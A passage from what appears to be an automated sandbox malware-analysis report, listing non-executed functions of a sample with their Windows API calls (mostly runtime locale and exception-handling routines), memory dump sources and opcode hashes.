                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7a8ac1e3ada0d64358addd4180ba8b71626a0b45abc8ac4bf1a093875721d1e6
                                                                            • Instruction ID: 40f21d7faad1b949cf3f503051ce3e33ac0e552fcb25554f41e01f6bc476fbf5
                                                                            • Opcode Fuzzy Hash: 7a8ac1e3ada0d64358addd4180ba8b71626a0b45abc8ac4bf1a093875721d1e6
                                                                            • Instruction Fuzzy Hash: E201F137B002119FDB16DE7AEC4096A33A6FBD0320B29813AF905CB994EB30D842C790

                                                                            Non-executed Functions

                                                                            Function 001477D6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLocaleInfoW.KERNEL32(?,2000000B,00147AF4,00000002,00000000,?,?,?,00147AF4,?,00000000), ref: 0014786F
                                                                            • GetLocaleInfoW.KERNEL32(?,20001004,00147AF4,00000002,00000000,?,?,?,00147AF4,?,00000000), ref: 00147898
                                                                            • GetACP.KERNEL32(?,?,00147AF4,?,00000000), ref: 001478AD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: InfoLocale
                                                                            • String ID: ACP$OCP
                                                                            • API String ID: 2299586839-711371036
                                                                            • Opcode ID: e928ea14eae213cf650bc48499eaf562925f7d530fc71c9b135326bfbad286c0
                                                                            • Instruction ID: 8a31cdb7d092bb73f89657e68f40fee11dd85e3dda37c3b2e2e53d7f1e119797
                                                                            • Opcode Fuzzy Hash: e928ea14eae213cf650bc48499eaf562925f7d530fc71c9b135326bfbad286c0
                                                                            • Instruction Fuzzy Hash: 9821C832B08102AADB388FA4DA08B9773A7FF50B61B578424E90AD75B4F732DD41C390
                                                                            Function 001479AB Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0013EC90: GetLastError.KERNEL32(?,00000008,00143196,00000000,00139083), ref: 0013EC94
                                                                              • Part of subcall function 0013EC90: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 0013ED36
                                                                            • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00147AB7
                                                                            • IsValidCodePage.KERNEL32(00000000), ref: 00147B00
                                                                            • IsValidLocale.KERNEL32(?,00000001), ref: 00147B0F
                                                                            • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00147B57
                                                                            • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00147B76
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                            • String ID:
                                                                            • API String ID: 415426439-0
                                                                            • Opcode ID: ab476360597c525a72ec0b981422034b4247294c16b6c8ddf0ff58881d91a129
                                                                            • Instruction ID: b1e0629896f5cbbd37abf6f3b3f2b14c4149a724ea8804da29e7112b9508f9db
                                                                            • Opcode Fuzzy Hash: ab476360597c525a72ec0b981422034b4247294c16b6c8ddf0ff58881d91a129
                                                                            • Instruction Fuzzy Hash: 96518172A04206AFDF20DFA4DC41ABE77B8FF58700F294469F915E71E0E7709A458B61
                                                                            Function 00147047 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0013EC90: GetLastError.KERNEL32(?,00000008,00143196,00000000,00139083), ref: 0013EC94
                                                                              • Part of subcall function 0013EC90: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 0013ED36
                                                                            • GetACP.KERNEL32(?,?,?,?,?,?,0013CC9C,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00147108
                                                                            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0013CC9C,?,?,?,00000055,?,-00000050,?,?), ref: 00147133
                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00147296
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast$CodeInfoLocalePageValid
                                                                            • String ID: utf8
                                                                            • API String ID: 607553120-905460609
                                                                            • Opcode ID: d5ecdb32a36fc96ecff260ca34d4085667f4bf5dbd634e92e5175abf7bce9c47
                                                                            • Instruction ID: 8c09284025c809b6ffa9006f07056df4d1e98e1b3fb161f24022f7534f527829
                                                                            • Opcode Fuzzy Hash: d5ecdb32a36fc96ecff260ca34d4085667f4bf5dbd634e92e5175abf7bce9c47
                                                                            • Instruction Fuzzy Hash: 0D714771A04302AAEB24AB74DC46FAB73ACEF15714F20442AF915DB1E1EBB0ED41C761
                                                                            Function 00134FA6 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00134FB2
                                                                            • IsDebuggerPresent.KERNEL32 ref: 0013507E
                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00135097
                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 001350A1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                            • String ID:
                                                                            • API String ID: 254469556-0
                                                                            • Opcode ID: 8eef06445329844fcd774ea97e96a5a6270a20339b6d4ce59186e4bcaa7c2de5
                                                                            • Instruction ID: 9b94f77a924364ea2a939875b12637345bd33499609c00efd2092e039602f8f5
                                                                            • Opcode Fuzzy Hash: 8eef06445329844fcd774ea97e96a5a6270a20339b6d4ce59186e4bcaa7c2de5
                                                                            • Instruction Fuzzy Hash: BC31F775D05318DBDF20EFA4D9897CDBBB8AF08700F1041AAE40DAB250EB719A85CF45
                                                                            Function 0014745A Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0013EC90: GetLastError.KERNEL32(?,00000008,00143196,00000000,00139083), ref: 0013EC94
                                                                              • Part of subcall function 0013EC90: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 0013ED36
                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001474AE
                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001474F8
                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001475BE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: InfoLocale$ErrorLast
                                                                            • String ID:
                                                                            • API String ID: 661929714-0
                                                                            • Opcode ID: 0bb9b7ea9bc6c69ff08ddf7b0682ea0450047733b3d89bc16b5c2080a3bfd45f
                                                                            • Instruction ID: d0df44245265c60076d0367954977269d812e670f3bac09760c8a3d549a98695
                                                                            • Opcode Fuzzy Hash: 0bb9b7ea9bc6c69ff08ddf7b0682ea0450047733b3d89bc16b5c2080a3bfd45f
                                                                            • Instruction Fuzzy Hash: 3B61B0B19086179FEB289F28CD82BBA77A9EF14300F11417AED19CA1E5F734D985CB50
                                                                            Function 00138F06 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00138FFE
                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00139008
                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00139015
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                            • String ID:
                                                                            • API String ID: 3906539128-0
                                                                            • Opcode ID: fc1eec9069dd929d0eee232713a89a62bbc8e2ffddfa467d63c2ef8ad8ec95ff
                                                                            • Instruction ID: 35ec4e2427b5c93a510e823e5e77237f6751fd063534765ab74713b47017eed2
                                                                            • Opcode Fuzzy Hash: fc1eec9069dd929d0eee232713a89a62bbc8e2ffddfa467d63c2ef8ad8ec95ff
                                                                            • Instruction Fuzzy Hash: 7131C574901318ABCB21DF68D98978DBBB8BF18710F5041DAF41CA7260E7709F818F44
                                                                            Function 00143560 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,?,?,?,0014355B,?,?,?,?,?,?,00000000), ref: 0014378D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExceptionRaise
                                                                            • String ID:
                                                                            • API String ID: 3997070919-0
                                                                            • Opcode ID: 89d66f51284d3baca7bf30083e5f82740102faa57745865108419815114fad7f
                                                                            • Instruction ID: e7e2f816e61fd623b9df28a4d4e7dc42565729140f3855262c92dd140c83cc31
                                                                            • Opcode Fuzzy Hash: 89d66f51284d3baca7bf30083e5f82740102faa57745865108419815114fad7f
                                                                            • Instruction Fuzzy Hash: 9EB13B71610609DFD719CF28C486B657BE0FF45365F268658E8AACF2B1C335EA92CB40
                                                                            Function 00134CCC Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00134CE2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FeaturePresentProcessor
                                                                            • String ID:
                                                                            • API String ID: 2325560087-0
                                                                            • Opcode ID: 309bd6d4a187569475443335c559eb4200c991bcf063f38d8679c13c911c3bee
                                                                            • Instruction ID: 051ad7201b85afc922786138c126b39be5c3c4349645cb14460a95c0aef791e2
                                                                            • Opcode Fuzzy Hash: 309bd6d4a187569475443335c559eb4200c991bcf063f38d8679c13c911c3bee
                                                                            • Instruction Fuzzy Hash: EF5181B1A00205CFEB15CFA9D8C27AABBF4FB48310F25842AD405EB750D379AA80CF50
                                                                            Function 00144493 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: da7514b08d6c523f9c908cf29cda49de920fd82585d7caba2db66c0edb6593ca
                                                                            • Instruction ID: db998b76770c8ee73406cb7ebe747c53f8c07e90c8febb469aac0f75523addbe
                                                                            • Opcode Fuzzy Hash: da7514b08d6c523f9c908cf29cda49de920fd82585d7caba2db66c0edb6593ca
                                                                            • Instruction Fuzzy Hash: C841AEB5804219AFDF20DF79CC89BAABBB9AF55304F1442D9E41DE3211DB359E848F20
                                                                            Function 001476AD Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0013EC90: GetLastError.KERNEL32(?,00000008,00143196,00000000,00139083), ref: 0013EC94
                                                                              • Part of subcall function 0013EC90: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 0013ED36
                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00147701
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast$InfoLocale
                                                                            • String ID:
                                                                            • API String ID: 3736152602-0
                                                                            • Opcode ID: d137964d1949fd19435b309b32aa18975805a0f2ff54f65b0a3fe962a204d182
                                                                            • Instruction ID: 80ab08e1b066ae3992e75595e0e5aef0a741cd82a536ffdf75847c6c9d10b0b0
                                                                            • Opcode Fuzzy Hash: d137964d1949fd19435b309b32aa18975805a0f2ff54f65b0a3fe962a204d182
                                                                            • Instruction Fuzzy Hash: 2521D432608206ABDB289B24DD46B7A73ACEF14316F10007AF905C72A1EB34ED45C790
                                                                            Function 00147334 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0013EC90: GetLastError.KERNEL32(?,00000008,00143196,00000000,00139083), ref: 0013EC94
                                                                              • Part of subcall function 0013EC90: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 0013ED36
                                                                            • EnumSystemLocalesW.KERNEL32(0014745A,00000001,00000000,?,-00000050,?,00147A8B,00000000,?,?,?,00000055,?), ref: 001473A6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                            • String ID:
                                                                            • API String ID: 2417226690-0
                                                                            • Opcode ID: 9f5f00387ea92c8368637e764d2dc3eb2214eaf5f0032933acfcaaf0e4aa91af
                                                                            • Instruction ID: 716f7fa3852f7979a8346ca0fd85d41839b3d572a27a3e124c56150bbe1ff841
                                                                            • Opcode Fuzzy Hash: 9f5f00387ea92c8368637e764d2dc3eb2214eaf5f0032933acfcaaf0e4aa91af
                                                                            • Instruction Fuzzy Hash: D8110C3B2047015FDB189F39C89167ABB91FF80358B19882DE94787B90E371B943D740
                                                                            Function 001478DC Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0013EC90: GetLastError.KERNEL32(?,00000008,00143196,00000000,00139083), ref: 0013EC94
                                                                              • Part of subcall function 0013EC90: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 0013ED36
                                                                            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00147676,00000000,00000000,?), ref: 00147908
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast$InfoLocale
                                                                            • String ID:
                                                                            • API String ID: 3736152602-0
                                                                            • Opcode ID: 8c4af11dcd8066f6c42cd3fc8bf818b659c5a99d7610c8c0c6fff1ed6e2e386a
                                                                            • Instruction ID: 0f437a3e1af18927f152e3b63822edc1fb2fdc847db5db63f626768a3ccc63ec
                                                                            • Opcode Fuzzy Hash: 8c4af11dcd8066f6c42cd3fc8bf818b659c5a99d7610c8c0c6fff1ed6e2e386a
                                                                            • Instruction Fuzzy Hash: C2F0A9366081116BDB285B24C805BBB7759EB40778F154465ED46A31D0DB74FE41C6D0
                                                                            Function 001473CF Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0013EC90: GetLastError.KERNEL32(?,00000008,00143196,00000000,00139083), ref: 0013EC94
                                                                              • Part of subcall function 0013EC90: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 0013ED36
                                                                            • EnumSystemLocalesW.KERNEL32(001476AD,00000001,00000000,?,-00000050,?,00147A4F,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00147419
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                            • String ID:
                                                                            • API String ID: 2417226690-0
                                                                            • Opcode ID: 390f669980dcb39daab2533fe14c56abdbd8660b59c6ff0834b8df75a90e1017
                                                                            • Instruction ID: 24a920a55ec7c9fea6c42b0e09534d7086a7fb8be2205a81c3bc6fbcd5804166
                                                                            • Opcode Fuzzy Hash: 390f669980dcb39daab2533fe14c56abdbd8660b59c6ff0834b8df75a90e1017
                                                                            • Instruction Fuzzy Hash: F1F0C2362043045FDB245F79A881A7A7B91EB81368F19842DF9058BAE0D7B19C42C750
                                                                            Function 0013F01F Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0013A8B5: EnterCriticalSection.KERNEL32(?,?,0013E968,?,00155700,00000008,0013EB2C,?,?,?), ref: 0013A8C4
                                                                            • EnumSystemLocalesW.KERNEL32(0013F012,00000001,00155780,0000000C,0013F441,00000000), ref: 0013F057
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                            • String ID:
                                                                            • API String ID: 1272433827-0
                                                                            • Opcode ID: 8bd53c104b87df7feeffe1139ebae08aac7e5d5db9ccc571d4fdf0fe89531bdd
                                                                            • Instruction ID: 35a08145e13743834002f373b193998e827f994cb00be82d502bc758694a57a2
                                                                            • Opcode Fuzzy Hash: 8bd53c104b87df7feeffe1139ebae08aac7e5d5db9ccc571d4fdf0fe89531bdd
                                                                            • Instruction Fuzzy Hash: 65F04F76A00200DFD704EFACE842B5C77F1FB48721F10402AF411DB6A1D7755941DB41
                                                                            Function 001472E9 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0013EC90: GetLastError.KERNEL32(?,00000008,00143196,00000000,00139083), ref: 0013EC94
                                                                              • Part of subcall function 0013EC90: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 0013ED36
                                                                            • EnumSystemLocalesW.KERNEL32(00147242,00000001,00000000,?,?,00147AAD,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00147320
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmpDownload File
